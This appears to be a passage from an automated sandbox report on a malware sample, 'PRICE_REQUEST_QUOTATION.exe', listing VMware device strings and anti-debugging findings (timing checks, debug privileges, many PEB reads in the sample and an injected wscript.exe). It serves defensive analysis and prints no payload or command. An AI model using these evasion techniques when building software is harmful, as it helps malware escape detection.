Source: explorer.exe, 00000006.00000000.290796557.0000000008C5E000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.298466156.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A402 mov eax, dword ptr fs:[00000030h] 0_2_7333A402
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A706 mov eax, dword ptr fs:[00000030h] 0_2_7333A706
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A744 mov eax, dword ptr fs:[00000030h] 0_2_7333A744
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A616 mov eax, dword ptr fs:[00000030h] 0_2_7333A616
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333A6C7 mov eax, dword ptr fs:[00000030h] 0_2_7333A6C7
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A190AF mov eax, dword ptr fs:[00000030h] 3_2_00A190AF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9080 mov eax, dword ptr fs:[00000030h] 3_2_009D9080
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h] 3_2_00A53884
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h] 3_2_00A53884
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h] 3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h] 3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h] 3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h] 3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h] 3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h] 3_2_00AA4015
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h] 3_2_00AA4015
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h] 3_2_009F0050
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h] 3_2_009F0050
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A92073 mov eax, dword ptr fs:[00000030h] 3_2_00A92073
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00AA1074 mov eax, dword ptr fs:[00000030h] 3_2_00AA1074
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h] 3_2_00A061A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h] 3_2_00A061A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A569A6 mov eax, dword ptr fs:[00000030h] 3_2_00A569A6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h] 3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009FC182 mov eax, dword ptr fs:[00000030h] 3_2_009FC182
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0A185 mov eax, dword ptr fs:[00000030h] 3_2_00A0A185
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A02990 mov eax, dword ptr fs:[00000030h] 3_2_00A02990
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A641E8 mov eax, dword ptr fs:[00000030h] 3_2_00A641E8
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h] 3_2_00A0513A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h] 3_2_00A0513A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h] 3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h] 3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h] 3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 mov ecx, dword ptr fs:[00000030h] 3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h] 3_2_009FB944
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h] 3_2_009FB944
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h] 3_2_009DB171
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h] 3_2_009DB171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28CD6 mov eax, dword ptr fs:[00000030h] 17_2_04D28CD6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D114FB mov eax, dword ptr fs:[00000030h] 17_2_04D114FB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59080 mov eax, dword ptr fs:[00000030h] 17_2_04C59080
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h] 17_2_04CD3884
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h] 17_2_04CD3884
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6849B mov eax, dword ptr fs:[00000030h] 17_2_04C6849B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C990AF mov eax, dword ptr fs:[00000030h] 17_2_04C990AF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8F0BF mov ecx, dword ptr fs:[00000030h] 17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A44B mov eax, dword ptr fs:[00000030h] 17_2_04C8A44B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h] 17_2_04C70050
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h] 17_2_04C70050
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h] 17_2_04CEC450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h] 17_2_04CEC450
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D12073 mov eax, dword ptr fs:[00000030h] 17_2_04D12073
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D21074 mov eax, dword ptr fs:[00000030h] 17_2_04D21074
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7746D mov eax, dword ptr fs:[00000030h] 17_2_04C7746D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h] 17_2_04D24015
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h] 17_2_04D24015
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h] 17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h] 17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h] 17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h] 17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h] 17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h] 17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h] 17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8BC2C mov eax, dword ptr fs:[00000030h] 17_2_04C8BC2C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h] 17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D08DF1 mov eax, dword ptr fs:[00000030h] 17_2_04D08DF1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h] 17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h] 17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h] 17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CE41E8 mov eax, dword ptr fs:[00000030h] 17_2_04CE41E8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7C182 mov eax, dword ptr fs:[00000030h] 17_2_04C7C182
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A185 mov eax, dword ptr fs:[00000030h] 17_2_04C8A185
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h] 17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04C8FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04C8FD9B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h] 17_2_04C861A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h] 17_2_04C861A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C835A1 mov eax, dword ptr fs:[00000030h] 17_2_04C835A1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h] 17_2_04C7B944
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h] 17_2_04C7B944
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C93D43 mov eax, dword ptr fs:[00000030h] 17_2_04C93D43
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD3540 mov eax, dword ptr fs:[00000030h] 17_2_04CD3540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C77D50 mov eax, dword ptr fs:[00000030h] 17_2_04C77D50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C962 mov eax, dword ptr fs:[00000030h] 17_2_04C5C962
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h] 17_2_04C7C577
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h] 17_2_04C7C577
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h] 17_2_04C5B171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h] 17_2_04C5B171
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h] 17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h] 17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h] 17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28D34 mov eax, dword ptr fs:[00000030h] 17_2_04D28D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 mov ecx, dword ptr fs:[00000030h] 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h] 17_2_04C8513A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h] 17_2_04C8513A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h] 17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h] 17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h] 17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h] 17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5AD30 mov eax, dword ptr fs:[00000030h] 17_2_04C5AD30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CDA537 mov eax, dword ptr fs:[00000030h] 17_2_04CDA537
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28ED6 mov eax, dword ptr fs:[00000030h] 17_2_04D28ED6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C836CC mov eax, dword ptr fs:[00000030h] 17_2_04C836CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C98EC7 mov eax, dword ptr fs:[00000030h] 17_2_04C98EC7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0FEC0 mov eax, dword ptr fs:[00000030h] 17_2_04D0FEC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C676E2 mov eax, dword ptr fs:[00000030h] 17_2_04C676E2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C816E0 mov ecx, dword ptr fs:[00000030h] 17_2_04C816E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEFE87 mov eax, dword ptr fs:[00000030h] 17_2_04CEFE87
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h] 17_2_04C8D294
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h] 17_2_04C8D294
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
